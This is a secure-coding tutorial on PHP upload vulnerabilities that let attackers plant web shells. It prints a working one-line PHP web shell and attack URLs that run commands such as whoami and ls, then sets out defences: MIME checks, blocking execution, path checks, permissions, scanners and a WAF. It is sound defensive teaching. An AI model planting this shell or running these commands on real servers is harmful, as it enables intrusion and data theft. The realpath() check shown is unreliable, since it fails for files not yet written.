Unprotected Web Shells Vulnerability:

A web shell is a malicious script uploaded by an attacker to a server that allows them to control the server remotely. If an attacker successfully uploads a PHP file to a server’s upload directory (or any accessible directory), they can use it as a web shell. A web shell often provides a simple interface for executing arbitrary commands on the server, reading and writing files, or exploiting other vulnerabilities on the server.

Example of Unprotected Web Shell Vulnerability:

1. Malicious File Upload:
   The attacker manages to upload a file called shell.php to the server via an upload form. The file might look like this:

<?php
// Simple PHP Web Shell
if (isset($_REQUEST['cmd'])) {
    $cmd = $_REQUEST['cmd'];
    system($cmd);  // Executes the shell command
}
?>

Accessing the Web Shell:
The attacker can now access the web shell by visiting the file URL in the browser:

http://example.com/uploads/shell.php?cmd=ls

By passing the cmd parameter with a command like ls, the attacker can execute the command on the server and list files in the current directory.

Exploiting the Vulnerability:
Once the attacker has remote access to the server through the web shell, they can:

• Run arbitrary commands (e.g., ls, cat, rm, etc.).
• Gain full control of the server, potentially allowing them to escalate the attack.
• Modify or delete critical files.
• Steal sensitive data (e.g., database credentials).
• Install additional backdoors.

Example of Exploit:

1. Upload the Shell:
   The attacker uploads the malicious shell.php to the /uploads/ directory (or another vulnerable directory).
2. Execute Commands via Shell:
   After the file is uploaded and accessed via the browser, the attacker can execute commands on the server:

http://example.com/uploads/shell.php?cmd=whoami

Output:

root

This indicates that the attacker has gained root access, which is often the case if the web server has insufficiently restricted user privileges.

Listing Directories:
The attacker can list all directories and files in the server:

http://example.com/uploads/shell.php?cmd=ls -alh /

The output might show all critical system files, further compromising the server.

Additional Exploitation:
The attacker might also upload other tools or scripts to escalate the attack. For example, they could upload reverse_shell.php, which connects back to the attacker’s machine for further control.

Fixing the Unprotected Web Shell Vulnerability:

To prevent the upload and execution of web shells, apply the following security measures:

1. File Type Validation and Restriction:

Always check both the file extension and MIME type to ensure that only valid files (e.g., images, documents) are uploaded.

Example in PHP:

// Allowed MIME types
$allowedMimeTypes = ['image/jpeg', 'image/png', 'application/pdf'];

// Get the MIME type of the uploaded file
$fileMimeType = mime_content_type($_FILES['file']['tmp_name']);

if (in_array($fileMimeType, $allowedMimeTypes)) {
    // Proceed with file upload
} else {
    echo "Invalid file type!";
}

Disable Execution of Uploaded Files:

Prevent the execution of any files in the upload directory. You can do this by using an .htaccess file (Apache) or server configuration.

Example .htaccess to prevent execution in the /uploads/ directory:

<FilesMatch "\.(php|php3|php4|php5|phtml)$">
    deny from all
</FilesMatch>

This will block the execution of any PHP file in the /uploads/ directory. Similarly, configure your server settings to disable PHP execution within the upload folder.

3. Use Safe Directory and Path Validation:

Ensure that the file is saved in a directory outside the web root, if possible. If you must store files in a web-accessible directory, sanitize file names to prevent directory traversal attacks.

Example using basename() to prevent directory traversal:

$fileName = basename($_FILES['file']['name']);  // Ensures no path traversal

Example using realpath() to ensure files are stored within a specific directory:

$uploadDir = '/var/www/uploads/';
$safeFilePath = realpath($uploadDir . $fileName);

if (strpos($safeFilePath, $uploadDir) !== 0) {
    echo "Invalid file path!";
    exit;
}

move_uploaded_file($_FILES['file']['tmp_name'], $safeFilePath);

Limit File Permissions:

Ensure that files in the upload directory have limited permissions. Do not allow files to be executed from the upload directory. Set the permissions of the uploaded files to be read-only.

Example:

chmod 644 /uploads/*

This ensures the uploaded files can be read but not executed.

5. Monitor and Scan for Web Shells:

Implement regular security monitoring tools to detect and remove web shells. Use file integrity checkers or automated security software to regularly scan for unusual file types or changes in the upload directories.

Example tools:

• ClamAV: Open-source antivirus software that can scan files for known threats.
• OSSEC: A host-based intrusion detection system (HIDS) that monitors and analyzes server logs.

6. Use Web Application Firewalls (WAFs):

A WAF can help protect your server from web shell attacks by blocking malicious HTTP requests. It can block PHP scripts or requests that contain suspicious parameters.

Example of using ModSecurity (WAF) with Apache:

# In your Apache config file, enable ModSecurity
SecRuleEngine On

To protect your system from unprotected web shells:

• Restrict file uploads to only allow safe types.
• Disable execution of files in upload directories.
• Use file sanitization, including basename() and realpath(), to prevent malicious file paths.
• Limit permissions on uploaded files to prevent their execution.
• Regularly monitor uploads for suspicious files using automated security tools.